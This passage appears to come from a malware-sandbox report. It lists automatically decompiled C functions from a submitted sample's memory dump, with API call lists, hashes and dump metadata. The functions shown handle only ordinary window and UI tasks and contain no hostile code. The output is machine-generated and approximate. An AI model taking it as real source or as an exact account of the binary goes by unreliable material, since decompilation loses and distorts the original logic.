					if(__eflags == 0) {
						_t45 = 0xe4bcbb;
					}
					_push(_t45);
					E00CA2ABC(_t64, _t89 - 0x10, _t85, _t88, __eflags);
					_t70 =  *0xe885a0; // 0x0
					 *(_t89 - 4) = 2;
					__eflags = _t70;
					if(_t70 != 0) {
						_t57 = _t85 * 0x34;
						__eflags = ( &(_t70[4]))[_t57];
						if(( &(_t70[4]))[_t57] != 0) {
							_t58 =  *(_t89 - 0x10);
							__eflags =  *(_t58 - 0xc);
							if( *(_t58 - 0xc) != 0) {
								SendMessageA( *(_t64 + 0x20), 0x420, 1,  *(_t89 + 0x14));
								E00CA68A8(_t89 - 0x14, _t89 - 0x10);
								_t88 =  *(_t89 - 0x14);
							} else {
								SendMessageA( *(_t64 + 0x20), 0x420, 1, _t58);
							}
						}
					}
					_push(1);
					_push( *((intOrPtr*)(_t88 - 0xc)) + 1);
					_t49 = E00DF075F();
					 *( *((intOrPtr*)(_t89 + 8)) + 0x24) = _t49;
					__eflags = _t49;
					if(_t49 != 0) {
						lstrcpyA(_t49, _t88);
						_t49 = E00CACA6C(0xe319d8, _t64);
						 *(_t89 - 0x18) = _t49;
						__eflags = _t49;
						if(_t49 != 0) {
							_t79 =  *_t49;
							_t86 = _t90;
							_t65 =  *((intOrPtr*)(_t79 + 0x170));
							 *(_t89 - 0x1c) = _t86;
							_t55 = E00CA68F8(_t65, _t86, _t88) + 0x10;
							__eflags = _t55;
							 *_t86 = _t55;
							 *0xe17a64( *(_t89 - 0x10) + 0xfffffff0, _t79);
							_t49 =  *_t65();
						}
					}
					_t50 = E00CA2975(_t49,  *(_t89 - 0x10) - 0x10);
					_t33 = _t88 - 0x10; // 0x0
					_t37 = E00CA2975(_t50, _t33);
					goto L17;
				}
			}

0x00d0e984
0x00d0e984
0x00d0e98b
0x00d0e990
0x00d0e994
0x00d0e999
0x00d0eab6
0x00d0eac6
0x00d0e9a9
0x00d0e9ab
0x00d0e9ac
0x00d0e9ae
0x00d0e9b3
0x00d0e9b5
0x00d0e9b9
0x00000000
0x00d0e9bb
0x00000000
0x00d0e9bb
0x00d0e9b9
0x00d0e9c6
0x00d0e9cd
0x00d0e9cd
0x00d0e9d0
0x00d0e9d3
0x00d0e9d6
0x00d0e9da
0x00d0e9dc
0x00d0e9de
0x00d0e9de
0x00d0e9e3
0x00d0e9e7
0x00d0e9ec
0x00d0e9f2
0x00d0e9f6
0x00d0e9f8
0x00d0e9fa
0x00d0e9fd
0x00d0ea02
0x00d0ea04
0x00d0ea07
0x00d0ea0b
0x00d0ea2d
0x00d0ea3a
0x00d0ea3f
0x00d0ea0d
0x00d0ea18
0x00d0ea18
0x00d0ea0b
0x00d0ea02
0x00d0ea46
0x00d0ea48
0x00d0ea49
0x00d0ea53
0x00d0ea56
0x00d0ea58
0x00d0ea5c
0x00d0ea68
0x00d0ea6d
0x00d0ea72
0x00d0ea74
0x00d0ea76
0x00d0ea7f
0x00d0ea81
0x00d0ea88
0x00d0ea91
0x00d0ea91
0x00d0ea96
0x00d0ea98
0x00d0eaa1
0x00d0eaa1
0x00d0ea74
0x00d0eaa9
0x00d0eaae
0x00d0eab1
0x00000000
0x00d0eab1

APIs

__EH_prolog3.LIBCMT ref: 00D0E98B
SendMessageA.USER32(00000000,00000420,00000001,?), ref: 00D0EA18
SendMessageA.USER32(00000000,00000420,00000001,?), ref: 00D0EA2D
lstrcpyA.KERNEL32(00000000,00000010,?,00000010,00CF636E,00000000,?,00000002,?,?), ref: 00D0EA5C

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$H_prolog3lstrcpy
String ID:
API String ID: 3361160815-0
Opcode ID: f49cf3c2fea4f2cc5c92c17854dac8f1b677186ae5da57863dd8a83066396b0d
Instruction ID: 183eb78a4448dd25ad419a8c119e16a965556616332dc8a66a87f68a22cd7c7a
Opcode Fuzzy Hash: f49cf3c2fea4f2cc5c92c17854dac8f1b677186ae5da57863dd8a83066396b0d
Instruction Fuzzy Hash: 0641BE71A002069FDB14DF68DC86BEE77B4FF49318F184429F855AB2E2CB309945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CC200B Relevance: 6.1, APIs: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00CC200B(void* __ebx, intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				intOrPtr* _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v72;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t41;
				intOrPtr* _t47;
				intOrPtr _t54;
				void* _t63;
				void* _t79;
				void* _t80;
				intOrPtr* _t85;
				signed int _t87;
				void* _t88;

				_t79 = __edx;
				_t67 = __ecx;
				_t66 = __ebx;
				_t41 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t41 ^ _t87;
				_t83 = __ecx;
				_v52 = _a4;
				_v44 = __ecx;
				_v56 = E00CB236A(__ebx, __ecx, __eflags);
				_t47 = E00CACA6C(0xe1aa60, E00CB277F(__ebx, _t67, _t79, GetParent( *(_t83 + 0x20))));
				_v48 = _t47;
				if(_t47 != 0 &&  *((intOrPtr*)(_t47 + 0x4dc0)) > 0) {
					_v24.left = 0;
					_v24.top = 0;
					_v24.right = 0;
					_v24.bottom = 0;
					GetClientRect( *(_t83 + 0x20),  &_v24);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t85 = _v48;
					_v60 =  *((intOrPtr*)(_t85 + 0x4dc0)) + _v24.top;
					_t54 =  *((intOrPtr*)(_t85 + 0xe0));
					if(_t54 == 1 || _t54 == 2 || _t54 == 4) {
						_v40.left = 0;
						_v40.top = 0;
						_v40.right = 0;
						_v40.bottom = 0;
						GetWindowRect( *(_t85 + 0x20),  &_v40);
						_t82 = _v44;
						E00CBA172(_v44,  &_v40);
						_v64 = _v40.right - GetSystemMetrics(7);
					} else {
						_t82 = _v44;
					}
					_v44 =  *((intOrPtr*)( *_t85 + 0x188));
					_t63 = E00CBE8BB(_t85, _t82);
					_t80 = _t88 - 0x10;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t83 = _v44;
					 *0xe17a64(_v52, _t63);
					 *_v44();
				}
				return E00DDCBCE(_v56, _t66, _v8 ^ _t87, _t79, _t80, _t83);
			}

0x00cc200b
0x00cc200b
0x00cc200b
0x00cc2011
0x00cc2018
0x00cc201f
0x00cc2021
0x00cc2025
0x00cc2030
0x00cc2045
0x00cc204a
0x00cc2051
0x00cc2068
0x00cc206f
0x00cc2072
0x00cc2075
0x00cc2078
0x00cc2084
0x00cc2085
0x00cc2086
0x00cc2087
0x00cc2088
0x00cc2094
0x00cc2097
0x00cc20a0
0x00cc20ae
0x00cc20b1
0x00cc20b4
0x00cc20b7
0x00cc20c1
0x00cc20c7
0x00cc20d0
0x00cc20e2
0x00cc20e7
0x00cc20e7
0x00cc20e7
0x00cc20f5
0x00cc20f8
0x00cc2103
0x00cc2109
0x00cc210a
0x00cc210b
0x00cc210c
0x00cc210d
0x00cc2112
0x00cc211b
0x00cc211b
0x00cc212d

APIs

GetParent.USER32(?), ref: 00CC2033
GetClientRect.USER32(?,?), ref: 00CC2078
GetWindowRect.USER32 ref: 00CC20C1
GetSystemMetrics.USER32 ref: 00CC20D7

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$ClientMetricsParentSystemWindow
String ID:
API String ID: 2120119201-0
Opcode ID: 6c9e1197f63a09323b42c2f78531bd586d639b6a62192b34aaf5269c727a59cf
Instruction ID: ec8c8654db01d6293dc4812fed6a98674923d64ef1633d770d4f965f5db67879
Opcode Fuzzy Hash: 6c9e1197f63a09323b42c2f78531bd586d639b6a62192b34aaf5269c727a59cf
Instruction Fuzzy Hash: 7D41FEB1D006099FCB05DFA8D9859EEBBFAFF09710F14402AE846F7250DB71AA41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00CD0136 Relevance: 6.1, APIs: 4, Instructions: 95
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00CD0136(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t49;
				void* _t50;
				intOrPtr _t52;
				int _t53;
				void* _t59;
				intOrPtr* _t62;
				intOrPtr _t70;
				void* _t76;
				void* _t78;
				intOrPtr* _t80;
				void* _t83;

				_t76 = __edx;
				_push(0x10);
				E00DDD52C(0xe09d67, __ebx, __edi, __esi);
				_t78 = __ecx;
				_t37 = __ecx + 0x80;
				if(_t37 == 0) {
					L16:
					_t38 = 0;
				} else {
					_t40 =  *((intOrPtr*)(_t37 + 0x20));
					if(_t40 == 0) {
						goto L16;
					} else {
						_t80 =  *((intOrPtr*)(_t83 + 0xc));
						if( *_t80 != _t40) {
							goto L16;
						} else {
							 *(_t83 - 0x1c) = 0;
							 *((intOrPtr*)(_t83 - 0x18)) = 0;
							GetCursorPos(_t83 - 0x1c);
							ScreenToClient( *(_t78 + 0x20), _t83 - 0x1c);
							_t62 = E00CCDF11(_t78, _t76,  *(_t83 - 0x1c),  *((intOrPtr*)(_t83 - 0x18)), 0, 0);
							if(_t62 == 0) {
								goto L16;
							} else {
								if( *(_t83 - 0x1c) >=  *((intOrPtr*)(_t78 + 0x358)) +  *((intOrPtr*)(_t78 + 0x328))) {
									if( *((intOrPtr*)(_t62 + 0x74)) == 0 ||  *((intOrPtr*)(_t78 + 0x300)) != 0) {
										 *0xe17a64(_t83 - 0x14);
										_t49 =  *((intOrPtr*)( *((intOrPtr*)( *_t62 + 0x5c))))();
										 *(_t83 - 4) = 1;
										_t50 = E00CA68A8(0xe870c4, _t49);
										_t70 =  *((intOrPtr*)(_t83 - 0x14));
										goto L11;
									}
								} else {
									if( *((intOrPtr*)(_t62 + 0x70)) == 0 ||  *((intOrPtr*)(_t78 + 0x300)) != 0) {
										 *0xe17a64(_t83 - 0x10);
										_t59 =  *((intOrPtr*)( *((intOrPtr*)( *_t62 + 0x58))))();
										 *(_t83 - 4) =  *(_t83 - 4) & 0x00000000;
										_t50 = E00CA68A8(0xe870c4, _t59);
										_t70 =  *((intOrPtr*)(_t83 - 0x10));
										L11:
										 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
										E00CA2975(_t50, _t70 - 0x10);
										_t80 =  *((intOrPtr*)(_t83 + 0xc));
									}
								}
								_t52 =  *0xe870c4; // 0xe681e4
								if( *((intOrPtr*)(_t52 - 0xc)) == 0) {
									goto L16;
								} else {
									 *((intOrPtr*)(_t80 + 0xc)) = _t52;
									_t53 = E00CCDE3C(_t78);
									if(_t53 != 0) {
										_t53 =  *(_t53 + 4);
									}
									SendMessageA( *(_t78 + 0xa0), 0x30, _t53, 0);
									_t38 = 1;
								}
							}
						}
					}
				}
				return E00DDD4FA(_t38);
			}

0x00cd0136
0x00cd0136
0x00cd013d
0x00cd0142
0x00cd0144
0x00cd014c
0x00cd0263
0x00cd0263
0x00cd0152
0x00cd0152
0x00cd0157
0x00000000
0x00cd015d
0x00cd015d
0x00cd0162
0x00000000
0x00cd0168
0x00cd016e
0x00cd0171
0x00cd0174
0x00cd0181
0x00cd0196
0x00cd019a
0x00000000
0x00cd01a0
0x00cd01af
0x00cd01ed
0x00cd0203
0x00cd020b
0x00cd0213
0x00cd021a
0x00cd021f
0x00000000
0x00cd021f
0x00cd01b1
0x00cd01b5
0x00cd01cb
0x00cd01d3
0x00cd01d5
0x00cd01df
0x00cd01e4
0x00cd0222
0x00cd0222
0x00cd0229
0x00cd022e
0x00cd022e
0x00cd01b5
0x00cd0231
0x00cd023a
0x00000000
0x00cd023c
0x00cd023e
0x00cd0241
0x00cd0248
0x00cd024a
0x00cd024a
0x00cd0258
0x00cd0260
0x00cd0260
0x00cd023a
0x00cd019a
0x00cd0162
0x00cd0157
0x00cd026a

APIs

__EH_prolog3.LIBCMT ref: 00CD013D
GetCursorPos.USER32(?), ref: 00CD0174
ScreenToClient.USER32 ref: 00CD0181

Part of subcall function 00CCDF11: PtInRect.USER32(?,?,?), ref: 00CCDF39
Part of subcall function 00CCDF11: GetClientRect.USER32(?,?), ref: 00CCDF5B
Part of subcall function 00CCDF11: PtInRect.USER32(?,?,?), ref: 00CCDF85

SendMessageA.USER32(?,00000030,00000000,00000000), ref: 00CD0258

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Client$CursorH_prolog3MessageScreenSend
String ID:
API String ID: 3885313687-0
Opcode ID: 55e12820f5f684881f9fec6bd21373eefc2388bef460f8fe26df1defa6adabcb
Instruction ID: 9da82721b78c386660996fa2e723409a41d4fcca333b91a3508e35dee001a8e6
Opcode Fuzzy Hash: 55e12820f5f684881f9fec6bd21373eefc2388bef460f8fe26df1defa6adabcb
Instruction Fuzzy Hash: 57316F30A05206DFDF18DFA8C898BAEB7B9FF44314F54406AE565AB3A1CB749E44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00D5893C Relevance: 6.1, APIs: 4, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00D5893C(void* __ebx, void* __ecx, void* __edx, void* __esi, intOrPtr _a4) {
				signed int _v8;
				struct tagRECT _v24;
				char _v40;
				long _v44;
				void* __edi;
				signed int _t33;
				void* _t49;
				void* _t50;
				intOrPtr _t52;
				intOrPtr _t55;
				void* _t59;
				void* _t60;
				intOrPtr _t65;
				signed int _t68;
				signed int _t70;

				_t62 = __esi;
				_t59 = __edx;
				_t68 = _t70;
				_t33 =  *0xe68dd4; // 0x8d2643c2
				_t34 = _t33 ^ _t68;
				_v8 = _t33 ^ _t68;
				_push(__ebx);
				_t49 = __ecx;
				_t52 =  *((intOrPtr*)(__ecx + 0x48));
				if(_t52 == 0) {
					L16:
					_pop(_t50);
					return E00DDCBCE(_t34, _t50, _v8 ^ _t68, _t59, _t60, _t62);
				} else {
					_t55 =  *((intOrPtr*)(_t52 + 0x1b8));
					_push(__esi);
					_v44 = 0;
					if(_t55 != 0 &&  *((intOrPtr*)(_t55 + 8)) != 0 &&  *((intOrPtr*)(_t55 + 4)) != 0) {
						_v44 = 1;
						L00D5B1B7(_t55);
					}
					_push(_t60);
					_v24.left = 0;
					_v24.top = 0;
					_v24.right = 0;
					_v24.bottom = 0;
					SetRectEmpty( &_v24);
					if(IsRectEmpty(_t49 + 0x1c) != 0) {
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t65 = _v44;
					_pop(_t60);
					if( *((intOrPtr*)(_t49 + 0x34)) != 0xffffffff) {
						 *((intOrPtr*)(_t49 + 0x2c)) = 1;
					} else {
						_t79 = _t65;
						if(_t65 == 0) {
							_push(4);
							_push( *((intOrPtr*)(_t49 + 0x40)));
							_push(_t65);
							_push( &_v40);
							_push( &_v24);
							_t34 = E00D586F0(_t49, _t49, _t59, _t60, _t65, _t79);
						}
					}
					if(_a4 != 0) {
						L00D5920F(_t49, _t60, 0);
						SetRectEmpty(_t49 + 0x1c);
						SetRectEmpty(_t49 + 0xc);
						_t34 =  *(_t49 + 0x4c);
						 *(_t49 + 0x4c) =  *(_t49 + 0x4c) & 0x00000000;
						 *(_t49 + 0x38) =  *(_t49 + 0x4c);
					}
					 *(_t49 + 0x30) =  *(_t49 + 0x30) & 0x00000000;
					_t56 =  *((intOrPtr*)(_t49 + 0x48));
					if( *((intOrPtr*)(_t49 + 0x48)) == 0) {
						E00CAA4E7(_t49, _t56, _t60, _t65, __eflags);
						asm("int3");
						return 0xe2b230;
					} else {
						_pop(_t62);
						if(_t65 == 0) {
							_t34 = E00D40DA4(_t56, 0);
						}
						goto L16;
					}
				}
			}

0x00d5893c
0x00d5893c
0x00d5893d
0x00d58942
0x00d58947
0x00d58949
0x00d5894c
0x00d5894d
0x00d5894f
0x00d58954
0x00d58a1f
0x00d58a24
0x00d58a2b
0x00d5895a
0x00d5895a
0x00d58960
0x00d58963
0x00d58968
0x00d58974
0x00d5897b
0x00d5897b
0x00d58980
0x00d58984
0x00d58988
0x00d5898b
0x00d5898e
0x00d58991
0x00d589a3
0x00d589a3
0x00d589af
0x00d589b0
0x00d589b1
0x00d589b2
0x00d589b3
0x00d589b6
0x00d589b7
0x00d589d4
0x00d589b9
0x00d589b9
0x00d589bb
0x00d589bd
0x00d589bf
0x00d589c7
0x00d589c8
0x00d589cc
0x00d589cd
0x00d589cd
0x00d589bb
0x00d589df
0x00d589e5
0x00d589ee
0x00d589f8
0x00d589fe
0x00d58a01
0x00d58a05
0x00d58a05
0x00d58a08
0x00d58a0c
0x00d58a11
0x00d58a2e
0x00d58a33
0x00d58a39
0x00d58a13
0x00d58a15
0x00d58a16
0x00d58a1a
0x00d58a1a
0x00000000
0x00d58a16
0x00d58a11

APIs

SetRectEmpty.USER32(?), ref: 00D58991
IsRectEmpty.USER32 ref: 00D5899B
SetRectEmpty.USER32(?), ref: 00D589EE
SetRectEmpty.USER32(?), ref: 00D589F8

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: EmptyRect
String ID:
API String ID: 2270935405-0
Opcode ID: 1b70844e5c07b6e077f9fad61d3d4dcf765ffefe9b61a4743d46fcf20273fc94
Instruction ID: 824d9254c2c8765d034eba5195612aee300fe3396cc98235e07f0a0c598300bf
Opcode Fuzzy Hash: 1b70844e5c07b6e077f9fad61d3d4dcf765ffefe9b61a4743d46fcf20273fc94
Instruction Fuzzy Hash: 2E318A71A012199BCF14DFA4C884BEEBBB8EF08712F18405AED01BB146CB759949DFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D5026F Relevance: 6.1, APIs: 4, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00D5026F(intOrPtr __ecx, char _a4, intOrPtr _a8) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				char _v44;
				struct HDWP__* _v48;
				intOrPtr _v52;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t33;
				char _t35;
				void* _t41;
				struct HDWP__* _t50;
				struct HDWP__* _t62;
				void* _t64;
				intOrPtr _t65;
				long _t67;
				signed int _t69;
				void* _t70;

				_t33 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t33 ^ _t69;
				_t65 = __ecx;
				_v52 = __ecx;
				_t35 =  *((intOrPtr*)(__ecx + 0x28));
				_v44 = _t35;
				if(_t35 == 0) {
					L10:
					return E00DDCBCE(_t35, _t54, _v8 ^ _t69, _t64, _t65, _t67);
				} else {
					do {
						_t54 =  *(E00CB29D4(_t65, _t67,  &_v44));
						_v48 = _t54;
						 *0xe17a64();
						_t41 =  *((intOrPtr*)( *((intOrPtr*)(_t54->i + 0x17c))))();
						_t67 = 0;
						if(_t41 != 0 ||  *((intOrPtr*)(_t65 + 4)) != 0) {
							if(_t54 != _a8) {
								_v40.left = _t67;
								_v40.top = _t67;
								_v40.right = _t67;
								_v40.bottom = _t67;
								GetWindowRect( *(_t54 + 0x20),  &_v40);
								_t62 = _t54;
								if(_a4 == 0) {
									E00CE57B6(_t62, _t64);
								} else {
									_v24.left = _t67;
									_v24.top = _t67;
									_v24.right = _t67;
									_v24.bottom = _t67;
									E00CE3722(_t54, _t62, _t64,  &_v24);
									if(EqualRect( &_v24,  &_v40) == 0) {
										_t50 = BeginDeferWindowPos( *(_t65 + 0x30));
										_t54 = _t50;
										_t67 =  &_v24;
										_push( &_v56);
										_t70 = _t70 - 0x10;
										_push(_v48);
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t65 = _v52;
										E00D50E60(_t65, _t64);
										EndDeferWindowPos(_t50);
									}
								}
							}
						}
					} while (_v44 != 0);
					goto L10;
				}
			}

0x00d50275
0x00d5027c
0x00d50282
0x00d50284
0x00d50287
0x00d5028a
0x00d5028f
0x00d5035b
0x00d50369
0x00d50295
0x00d50298
0x00d502a3
0x00d502a5
0x00d502b2
0x00d502ba
0x00d502bc
0x00d502c0
0x00d502ce
0x00d502d3
0x00d502d7
0x00d502da
0x00d502dd
0x00d502e3
0x00d502ed
0x00d502ef
0x00d50349
0x00d502f1
0x00d502f4
0x00d502f8
0x00d502fb
0x00d502fe
0x00d50301
0x00d50316
0x00d5031b
0x00d50321
0x00d50323
0x00d50329
0x00d5032a
0x00d5032f
0x00d50332
0x00d50333
0x00d50334
0x00d50335
0x00d50336
0x00d5033b
0x00d50341
0x00d50341
0x00d50316
0x00d502ef
0x00d502ce
0x00d50352
0x00000000
0x00d50298

APIs

GetWindowRect.USER32 ref: 00D502E3
EqualRect.USER32 ref: 00D5030E
BeginDeferWindowPos.USER32(?), ref: 00D5031B
EndDeferWindowPos.USER32(00000000,?), ref: 00D50341

Part of subcall function 00CE57B6: GetWindowRect.USER32 ref: 00CE57CA
Part of subcall function 00CE57B6: GetParent.USER32(?), ref: 00CE5820
Part of subcall function 00CE57B6: GetParent.USER32(?), ref: 00CE5833

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$Rect$DeferParent$BeginEqual
String ID:
API String ID: 2054780619-0
Opcode ID: 3c0ba62d7e024a3b2d0521d9cff6bba39bc0eb804c7c0dd2ac4a5f1c4e527ed5
Instruction ID: 94d145a14ee6f4275c64105d6353ef9fa61c68878b1999637a541df7b1ab19ff
Opcode Fuzzy Hash: 3c0ba62d7e024a3b2d0521d9cff6bba39bc0eb804c7c0dd2ac4a5f1c4e527ed5
Instruction Fuzzy Hash: 0B311A71E00619AFCF01DFA5D9849EEBFB9FF08711F54416AE805B7250DB70AA48CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D00E6D Relevance: 6.1, APIs: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00D00E6D(intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __eflags, intOrPtr _a4, signed int _a8, struct tagPOINT _a12, intOrPtr _a16) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				long _v44;
				intOrPtr _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t32;
				intOrPtr _t34;
				long _t36;
				void* _t38;
				int _t52;
				intOrPtr* _t55;
				intOrPtr* _t65;
				void* _t70;
				signed int _t72;

				_t68 = __edi;
				_t67 = __edx;
				_t32 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t32 ^ _t72;
				_t34 = _a4;
				_push(_t34);
				_t55 = __ecx;
				_v48 = _t34;
				_t71 = E00D7B058(__ecx, __edx, __edi, _t70, __eflags);
				_v44 = _t71;
				if(_t71 == 0) {
					L4:
					_t36 = 0;
				} else {
					_t38 = E00CACB0B(_t71, 0xe687c8);
					_t71 =  *((intOrPtr*)( *_t71 + 4));
					 *0xe17a64(__edi);
					 *_t71();
					_t68 = 1;
					if(_t38 == 0) {
						goto L4;
					} else {
						_t71 = 0;
						_v24.left = 0;
						_v24.top = 0;
						_v24.right = 0;
						_v24.bottom = 0;
						GetWindowRect( *(_t55 + 0xe88),  &_v24);
						E00CBA172(_t55,  &_v24);
						_push(_a16);
						if(PtInRect( &_v24, _a12.x) == 0) {
							_v40.left = 0;
							_v40.top = 0;
							_v40.right = 0;
							_v40.bottom = 0;
							GetWindowRect( *(_t55 + 0x1630),  &_v40);
							E00CBA172(_t55,  &_v40);
							_push(_a16);
							_t52 = PtInRect( &_v40, _a12.x);
							_t65 = _t55;
							__eflags = _t52;
							if(_t52 == 0) {
								_t36 = E00CF3E37(_t65, _t67, _v48, _a8, _a12, _a16);
							} else {
								E00D0143A(_t55, _t65);
								goto L4;
							}
						} else {
							E00D01606(_t55, 0);
							goto L4;
						}
					}
				}
				return E00DDCBCE(_t36, _t55, _v8 ^ _t72, _t67, _t68, _t71);
			}

0x00d00e6d
0x00d00e6d
0x00d00e73
0x00d00e7a
0x00d00e7d
0x00d00e82
0x00d00e83
0x00d00e85
0x00d00e8d
0x00d00e8f
0x00d00e94
0x00d00f02
0x00d00f02
0x00d00e96
0x00d00e9e
0x00d00ea9
0x00d00eae
0x00d00eb7
0x00d00ebb
0x00d00ebc
0x00000000
0x00d00ebe
0x00d00ec1
0x00d00eca
0x00d00ecd
0x00d00ed0
0x00d00ed3
0x00d00ed6
0x00d00ee2
0x00d00ee7
0x00d00ef9
0x00d00f17
0x00d00f21
0x00d00f24
0x00d00f27
0x00d00f2a
0x00d00f36
0x00d00f3b
0x00d00f45
0x00d00f4b
0x00d00f4d
0x00d00f4f
0x00d00f64
0x00d00f51
0x00d00f51
0x00000000
0x00d00f51
0x00d00efb
0x00d00efd
0x00000000
0x00d00efd
0x00d00ef9
0x00d00ebc
0x00d00f11

APIs

Part of subcall function 00D7B058: __EH_prolog3_catch.LIBCMT ref: 00D7B05F

GetWindowRect.USER32 ref: 00D00ED6

Part of subcall function 00CBA172: ScreenToClient.USER32 ref: 00CBA181
Part of subcall function 00CBA172: ScreenToClient.USER32 ref: 00CBA18E

PtInRect.USER32(?,?,?), ref: 00D00EF1

Part of subcall function 00D01606: KillTimer.USER32(?,0000EC13,?,?,00D00F02), ref: 00D01694

GetWindowRect.USER32 ref: 00D00F2A
PtInRect.USER32(?,?,?), ref: 00D00F45

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
